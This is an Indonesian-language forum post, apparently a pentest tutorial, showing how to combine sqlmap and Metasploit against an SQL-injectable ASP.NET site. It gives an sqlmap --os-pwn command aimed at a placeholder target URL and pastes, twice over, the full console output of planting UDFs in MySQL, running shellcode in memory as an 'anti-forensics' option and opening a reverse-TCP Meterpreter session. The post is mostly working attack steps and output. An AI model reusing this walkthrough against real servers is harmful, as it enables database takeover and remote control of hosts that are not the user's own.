12-06-2012, 04:47 PM
sebagai framework , metasploit memiliki kemampuan untuk terintegrasi dengan berbagai tools lainnya .. sebagai contoh kli ini saya akan mengintegrasikan metasploit dengan sqlmap , tools analisis kerentanan pada database sql :-bd
Untuk tutorial mengenai sqlmap .. dapat anda lihat di
http://indonesianbacktrack.or.id/forum/s...order=desc
Untuk saat ini , maaf saya memakai dracos linux sebagai contoh ...dapat anda sesuaikan dengan os pentest anda
some shit for a walker area ...
[shcode=bash][INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: MySQL 5.0
[12:9:13] [INFO] fingerprinting the back-end DBMS operating system
[12:9:15] [INFO] the back-end DBMS operating system is Windows
how do you want to establish the tunnel?
[1] TCP: Metasploit Framework (default)
[2] ICMP: icmpsh - ICMP tunneling
>
[16:10:05] [INFO] testing if current user is DBA
[12:10:15] [INFO] fetching current user
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
>
[12:10:07] [INFO] checking if UDF 'sys_bineval' already exist
[12:10:08] [INFO] checking if UDF 'sys_exec' already exist
[12:10:10] [INFO] detecting back-end DBMS version from its banner
[12:10:12] [INFO] retrieving MySQL base directory absolute path
[12:10:13] [INFO] creating UDF 'sys_bineval' from the binary UDF file
[12:10:15] [INFO] creating UDF 'sys_exec' from the binary UDF file
how do you want to execute the Metasploit shellcode on the back-end database underlying operating system?
[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)
[2] Stand-alone payload stager (file system way)
>
[hh:mm:29] [INFO] creating Metasploit Framework 3 multi-stage shellcode
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports
between the specified and 65535
[3] Bind TCP: Listen on the database host for a connection
>
which is the local address? [xxx.xxx.xxx.xxx]
which local port number do you want to use? [555]
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
>
[12:10:15] [INFO] creation in progress ... done
[12:10:16] [INFO] running Metasploit Framework 3 command line interface locally, please wait..
=[ metasploit v3.8.0-dev [core:3.8 api:1.0]
+ -- --=[ 688 exploits - 357 auxiliary - 39 post
+ -- --=[ 217 payloads - 27 encoders - 8 nops
=[ svn r12655 updated today (2012.12.06)
PAYLOAD => windows/meterpreter/reverse_tcp
EXITFUNC => thread
LPORT => 555
LHOST => xxx.xxx.xxx.xxx
[*] Started reverse handler on xxx.xxx.xxx.xxx:555
[*] Starting the payload handler...
[hh:mm:48] [INFO] running Metasploit Framework 3 shellcode remotely via UDF 'sys_bineval',
please wait..
[*] Sending stage (749056 bytes) to xxx.xxx.xxx.xxx
[*] Meterpreter session 1 opened (xxx.xxx.xxx.xxx:9128 -> xxx.xxx.xxx.xxx:555) at Thu Dec 06[/shcode]
meterpreter pun terbuka ..
Untuk tutorial mengenai sqlmap .. dapat anda lihat di
http://indonesianbacktrack.or.id/forum/s...order=desc
Code:
root@dracos:/pentest/vulnerability-assestment/database-scanner/sqlmap# ./sqlmap.py -u "http://localhost.com/example.aspx?id=1" --os-pwn --msf-path /opt/metasploit-4.4.0/msf3/Untuk saat ini , maaf saya memakai dracos linux sebagai contoh ...dapat anda sesuaikan dengan os pentest anda
Code:
root@dracos:/pentest/vulnerability-assestment/database-scanner/sqlmap# ./sqlmap.py -u "http://situs-target.com/pagevulner.aspx?id=1" --os-pwn --msf-path /opt/metasploit-4.4.0/msf3/some shit for a walker area ...
[shcode=bash][INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: MySQL 5.0
[12:9:13] [INFO] fingerprinting the back-end DBMS operating system
[12:9:15] [INFO] the back-end DBMS operating system is Windows
how do you want to establish the tunnel?
[1] TCP: Metasploit Framework (default)
[2] ICMP: icmpsh - ICMP tunneling
>
[16:10:05] [INFO] testing if current user is DBA
[12:10:15] [INFO] fetching current user
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
>
[12:10:07] [INFO] checking if UDF 'sys_bineval' already exist
[12:10:08] [INFO] checking if UDF 'sys_exec' already exist
[12:10:10] [INFO] detecting back-end DBMS version from its banner
[12:10:12] [INFO] retrieving MySQL base directory absolute path
[12:10:13] [INFO] creating UDF 'sys_bineval' from the binary UDF file
[12:10:15] [INFO] creating UDF 'sys_exec' from the binary UDF file
how do you want to execute the Metasploit shellcode on the back-end database underlying operating system?
[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)
[2] Stand-alone payload stager (file system way)
>
[hh:mm:29] [INFO] creating Metasploit Framework 3 multi-stage shellcode
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports
between the specified and 65535
[3] Bind TCP: Listen on the database host for a connection
>
which is the local address? [xxx.xxx.xxx.xxx]
which local port number do you want to use? [555]
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
>
[12:10:15] [INFO] creation in progress ... done
[12:10:16] [INFO] running Metasploit Framework 3 command line interface locally, please wait..
=[ metasploit v3.8.0-dev [core:3.8 api:1.0]
+ -- --=[ 688 exploits - 357 auxiliary - 39 post
+ -- --=[ 217 payloads - 27 encoders - 8 nops
=[ svn r12655 updated today (2012.12.06)
PAYLOAD => windows/meterpreter/reverse_tcp
EXITFUNC => thread
LPORT => 555
LHOST => xxx.xxx.xxx.xxx
[*] Started reverse handler on xxx.xxx.xxx.xxx:555
[*] Starting the payload handler...
[hh:mm:48] [INFO] running Metasploit Framework 3 shellcode remotely via UDF 'sys_bineval',
please wait..
[*] Sending stage (749056 bytes) to xxx.xxx.xxx.xxx
[*] Meterpreter session 1 opened (xxx.xxx.xxx.xxx:9128 -> xxx.xxx.xxx.xxx:555) at Thu Dec 06[/shcode]
meterpreter pun terbuka ..
FOLLOW @DutaLinux
for more question and sharing about security and Opensource only
for more question and sharing about security and Opensource only